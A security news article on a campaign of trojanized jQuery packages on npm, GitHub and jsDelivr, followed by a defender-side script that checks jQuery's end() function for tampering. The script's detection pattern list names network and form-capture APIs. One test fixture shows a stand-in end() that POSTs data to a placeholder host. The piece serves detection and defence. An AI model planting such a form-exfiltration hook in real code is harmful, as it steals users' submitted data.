Trojanized jQuery Packages Detected on npm and GitHub

Unknown threat actors have been spreading compromised versions of jQuery on npm, GitHub, and jsDelivr, indicating a complex and persistent supply chain attack.

Researchers’ analysis highlights the attack’s distinctiveness: the packages vary considerably from one another. The attackers hid the malware inside jQuery’s rarely used ‘end’ function, which is called internally by the popular ‘fadeTo’ animation function.

The campaign has involved 68 packages, published to the npm registry between May 26 and June 23, 2024. The packages have been given names such as cdnjquery, footersicons, jquertyi, jqueryxxx, logoo, and sytlesheets.

Evidence suggests that each of these malicious packages was manually assembled and published. This conclusion is based on the variety of names, inclusion of personal files, and the extended period over which the packages were uploaded. This manual approach contrasts with the automated methods typically seen in such attacks.

Researchers found that the malware exfiltrates website form data to a remote URL from within the ‘end’ function. Further investigation revealed the trojanized jQuery file hosted in a GitHub repository linked to an account named “indexsc.” The same repository also contains JavaScript files pointing to the modified library.
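A defender-side check for the hook described above, added here as an example and not code from the article or the jQuery project: it extracts the `end` method from a jQuery build and flags it if the body no longer matches the upstream one-liner or references network or form APIs. The fixtures are constructed; in practice you would feed it the contents of node_modules/jquery/dist/jquery.js.

```javascript
// Added example (not from the article or the jQuery project): flag a jQuery
// build whose `end` method, the hook the article says the trojanized packages
// used, no longer matches the upstream one-liner or references network APIs.
// In practice, pass it the text of node_modules/jquery/dist/jquery.js.

// jQuery's real end() (1.x through 3.x) only pops the previous matched set.
// Compared with whitespace and semicolons stripped so minified builds match.
const CANONICAL_END = "returnthis.prevObject||this.constructor()";

// Things that have no business inside end(); any hit is a red flag.
const SUSPICIOUS = [
  /\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\bsendBeacon\b/, /\bnew\s+Image\b/,
  /\.src\s*=/, /\bdocument\.forms\b/, /\bFormData\b/, /\bserialize\s*\(/,
];

// Return the body text of the first `end: function(...) {...}`, or null.
// Assumption: a plain brace counter suffices, i.e. no stray braces in strings.
function extractEndBody(src) {
  const m = /\bend\s*:\s*function\s*\([^)]*\)\s*\{/.exec(src);
  if (!m) return null;
  const start = m.index + m[0].length;
  let depth = 1, i = start;
  for (; i < src.length && depth > 0; i++) {
    if (src[i] === "{") depth++;
    else if (src[i] === "}") depth--;
  }
  return depth === 0 ? src.slice(start, i - 1) : null;
}

// Verdict: { found, tampered, reasons[] }. A missing end() is also suspicious.
function inspectJqueryEnd(src) {
  const body = extractEndBody(src);
  if (body === null) return { found: false, tampered: true, reasons: ["end() not found"] };
  const reasons = [];
  if (body.replace(/[\s;]/g, "") !== CANONICAL_END) reasons.push("end() body differs from upstream");
  for (const re of SUSPICIOUS) if (re.test(body)) reasons.push(`suspicious reference ${re.source}`);
  return { found: true, tampered: reasons.length > 0, reasons };
}

// Constructed fixtures, not real package contents: a clean unminified build, a
// clean minified build, and a stand-in for a tampered end() that phones home.
const SAMPLES = {
  clean: "jQuery.fn.extend({\n  end: function() {\n    return this.prevObject || this.constructor();\n  },\n  add: function( selector ) { return this; }\n});",
  minified: "e.fn.extend({end:function(){return this.prevObject||this.constructor()},add:function(t){return this}})",
  trojanized: "jQuery.fn.extend({\n  end: function() {\n    fetch(\"https://collector.invalid/\", { method: \"POST\", body: payload });\n    return this.prevObject || this.constructor();\n  }\n});",
};

for (const [name, src] of Object.entries(SAMPLES)) {
  const v = inspectJqueryEnd(src);
  console.log(`${name}: ${v.tampered ? "TAMPERED" : "ok"} ${v.reasons.join("; ")}`);
}
```

A hash comparison against the published jQuery release is the stronger check; this function is the cheap triage step for builds whose hashes you cannot match.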

Researchers note that jsDelivr constructs these GitHub URLs automatically, with no explicit upload to the CDN; loading the file through jsDelivr rather than directly from GitHub may be an attempt to make the source look legitimate or to get past firewalls.

This incident follows Datadog’s discovery of malicious packages on the Python Package Index (PyPI) repository, capable of downloading a second-stage binary from an attacker-controlled server based on CPU architecture.

To mitigate the risks associated with trojanized jQuery packages, developers and organizations should prioritize supply chain security. This includes verifying the integrity of packages before integrating them into projects, using tools to detect tampered packages, and keeping an updated list of trusted sources. Continuous monitoring and automated security scans of code dependencies can help identify and mitigate potential threats.